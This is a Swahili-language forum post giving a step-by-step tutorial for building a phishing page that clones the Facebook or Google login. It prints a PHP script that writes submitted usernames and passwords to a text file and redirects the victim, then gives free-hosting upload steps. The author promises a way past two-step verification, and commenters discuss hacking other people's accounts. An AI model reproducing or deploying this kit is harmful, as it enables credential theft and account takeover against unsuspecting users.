TechzLog in

Tztech problem fix


Jinsi ya kuiba password za Facebook au Google (phishing)

Share

20181120
Jinsi ya kuiba password za Facebook au Google (phishing)

Nini ni phishing? Question
Phishing ni mbinu maarufu sana kutumika kwenye hacking na kuiba password na details a mtu na kuiba habari nyeti kama kadi za bank, jina la mtumiaji wa benki na password nk. 

Phishing ni mchakato wa kuunda copy au duplicate website iliyotengenezwa kwa nia ya kuiba password ya mtumiaji au maelezo mengine nyeti kama maelezo ya kadi ya bank .

Ni rahisi kwa mtu yeyote ambaye ana ujuzi mdogo wa kiufundi kupata uwezo wa kutengeneza na ndiyo sababu njia hii inajulikana sana.

Mtumiaji akibonyeza kwenye website ya uwongo Kuamini wanaangalia ukurasa waliokusudia, wanaingiza sifa zao za kuingia ili kufikia huduma watakayo.  bila kujua victim (yeye) aliingiza habari zao za kibinafsi kwenye website ya hacker.  Na sasa hacker ina sifa zao za kuingia katika Facebook, hii inaweza kuwa kama matokeo kama tovuti nyingine, kama benki online.

Hata hivyo, hacker sasa anaweza kuharibu kiasi cha uovu juu ya maisha ya kijamii ya mtu.  Ikiwa hutokea kuwa profile ya biashara ya Facebook, wanaweza kuharibu biashara zao.  Leo, hata hivyo, tutaanzisha kuiga ukurasa wa kuingia wa Facebook na google ili kukuonyesha ni rahisi jinsi ya kuanza kujua njia hiyo.  Hebu tuangalie kwa makini hatua zinazohitajika. 

JINSI YA KUTENGENEZA A PHISHING WEBPAGE pirat

Hatua jinsi ya kutengeneza page ya uwongo.

INDEX.HTML


  1. Ingia Facebook au google log-in page.
  2. Bonyeza Ctrl + U au right click na chagua "view source page" ili kuona source code za website hiyo.
  3. Select all na copy and paste to notepad (ctrl+a)+(ctrl+c).
  4. On notepad bonyeza Ctrl+F 
  5. Tafuta "action" and bonyeza search
  6. Mfano (itatokea)=    action=”https://www.facebook.com/login.php?login_attempt=1″
  7. Futa kilakitu on quotes ("..") alafu weka post.php. Ipi itatokea kama (action=”post.php”)
  8. Save iyo file as index.html (hii ndo webpage yako)


POST.PHP



  1. Open New Text Doc 
  2. Copy code hizi:

    Code:

    <?php
     header (‘Location:http://www.facebook.com/login.php?&e=1348092&email=’);
     $handle = fopen(“usernames.txt”, “a”);
     foreach($_POST as $variable => $value) {
     fwrite($handle, $variable);
     fwrite($handle, “=”);
     fwrite($handle, $value);
     fwrite($handle, “rn”);
     }
     fwrite($handle, “rn”);
     fclose($handle);
     exit;
     ?>



  3. Save as Post.php





UPLOADING PAGE HIYO MTANDAONI.



  1. Nenda Infinity Free .
  2. Fungua Account.
  3. Log-in Vista panel.
  4. Go to File Manager
  5. Go to htdocs
  6. Weka files zako humo
  7. Share link....


ENJOY!!!!!!!! affraid


Na pia on next post ntapost jinsi ya kutengeneza a phishing webpage kwa wale waliokuwa secured sana like 2 step verification na wanaochunguza link sana so login for notification............comment for recommendations or problems. Rolling Eyes

_________________
Twisted Evil Justme
remove_circleSimilar topics

Comments

pamoja mkuu ahsante sana
Mimi kwangu nayaona hya hapa action="/search/web/direct_search.php"
pili unakuwa kwenye acaunt yako au yake yy unayetaka kumhach
avatar
Fungua a new login page Bila kutumia account ya Mtu au just ingia new private window au incognito mode.
Permissions in this forum:
You cannot reply to topics in this forum